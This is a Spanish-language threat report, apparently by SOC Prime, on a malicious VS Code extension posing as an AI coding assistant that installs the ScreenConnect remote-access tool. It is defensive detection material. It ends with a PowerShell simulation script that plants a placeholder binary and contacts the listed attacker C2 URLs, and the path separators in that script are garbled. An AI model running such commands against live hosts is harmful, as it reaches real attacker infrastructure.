SOC Prime Bias: Crítico

28 Jan 2026 09:58 UTC

Extensión de VS Code Fake ClowdBot despliega ScreenConnect RAT

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Extensión de VS Code Fake ClowdBot despliega ScreenConnect RAT
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Una extensión maliciosa de Visual Studio Code llamada ClawdBot Agent se hace pasar por un asistente de codificación con IA, pero instala de manera encubierta una herramienta de acceso remoto ScreenConnect weaponizada en Windows cuando se lanza VS Code. Al iniciar, la extensión descarga un archivo de configuración de un dominio controlado por el atacante, luego descarga y ejecuta un binario falso de VS Code (Code.exe) junto con DLLs de soporte. Como una vía de entrega secundaria, puede obtener el mismo instalador desde un enlace de Dropbox para mantener la disponibilidad de la carga útil. La campaña abusa de una herramienta de soporte de TI confiable para mezclarse con la actividad legítima de administración remota y reducir la sospecha.

Investigación

Los investigadores adquirieron el archivo package.json de la extensión, confirmaron la activación al iniciar VS Code y recuperaron la configuración JSON remota que enumera los componentes maliciosos. El análisis binario mostró módulos ScreenConnect firmados que se comunicaban con un servidor de retransmisión personalizado. Se encontró lógica adicional de respaldo en JavaScript y PowerShell, haciendo referencia a dominios secundarios y a cargas útiles alojadas en Dropbox. Se observaron artefactos en disco bajo la carpeta %TEMP%Lightshot.

Mitigación

Elimine la extensión ClawdBot Agent de VS Code y borre los archivos restantes de la ubicación de instalación de ScreenConnect y del directorio %TEMP%Lightshot. Desinstale el servicio cliente de ScreenConnect y bloquee la conectividad saliente a los dominios de retransmisión e IPs identificados. Rote cualquier clave API o secreto que pueda haber sido ingresado en la extensión.

Respuesta

Detecte la extensión maliciosa monitoreando las instalaciones de extensiones de VS Code y la creación del directorio Lightshot. Alerta sobre la ejecución de binarios Code.exe o ScreenConnect desde rutas no estándar y sobre conexiones salientes a meeting.bulletmailer.net:8041 o la dirección IP asociada. Realice análisis forense del host para confirmar la eliminación de persistencia e identificar cualquier carga útil adicional.

Flujo de Ataque

Ejecución de Simulación

Requisito: Debe haber pasado la verificación previa de Telemetría y Línea de Base.

Narrativa de Ataque & Comandos

  1. El atacante publica una extensión trojanizada de VS Code titulado “Clawdbot Helper”.
  2. La víctima instala la extensión a través del Marketplace de VS Code, que ejecuta un postinstall script que silenciosamente descarga el cliente ScreenConnect (ScreenConnect.Client.exe) en %APPDATA%ScreenConnect.
  3. Inmediatamente después de la instalación, el cliente inicia tres conexiones TCP salientes a los dominios C2 controlados por el atacante para recuperar cargas útiles adicionales y reportar el estado del host.
  4. Las conexiones salientes generan registros de Event ID 3 de Sysmon que coinciden con la dest_ip lista, cumpliendo con la regla de detección.

Script de Prueba de Regresión

# --------------------------------------------------------------
# Rutina simulada de post instalación de extensión maliciosa de VS Code
# --------------------------------------------------------------

# Paso 1 – Dejar un binario ScreenConnect simulado (simulado)
$payloadPath = "$env:APPDATAScreenConnectScreenConnect.Client.exe"
New-Item -ItemType Directory -Path (Split-Path $payloadPath) -Force | Out-Null
# Crear un binario de marcador inofensivo (por ejemplo, una copia de notepad.exe)
Copy-Item -Path "$env:SystemRootSystem32notepad.exe" -Destination $payloadPath -Force

# Paso 2 – Lanzar conexiones salientes a cada host C2
$c2Hosts = @(
    "http://meeting.bulletmailer.net/collect",
    "http://clawdbot.getintwopc.site/payload",
    "https://www.dropbox.com/s/evilpayload.exe"
)

foreach ($url in $c2Hosts) {
    try {
        # Solicitud web silenciosa; -UseBasicParsing evita mensajes de UI
        Invoke-WebRequest -Uri $url -Method GET -UseBasicParsing -TimeoutSec 5 | Out-Null
        Write-Host "Se contactó a $url"
    } catch {
        Write-Host "Falló el contacto a $url (esperado en un sandbox)."
    }
}

# Fin del script – en este punto Sysmon debería haber registrado tres
# eventos NetworkConnect cuyos valores DestinationIp coinciden con la regla.

Comandos de Limpieza

# --------------------------------------------------------------
# Eliminar artefactos simulados
# --------------------------------------------------------------

# Detener cualquier trabajo de PowerShell en curso (ninguno en este script simple)
Get-Job | Remove-Job -Force

# Borrar la carpeta cliente ScreenConnect simulada
Remove-Item -Path "$env:APPDATAScreenConnect" -Recurse -Force

# Opcionalmente, borrar el buffer de Sysmon (requiere admin)
# sysmon -c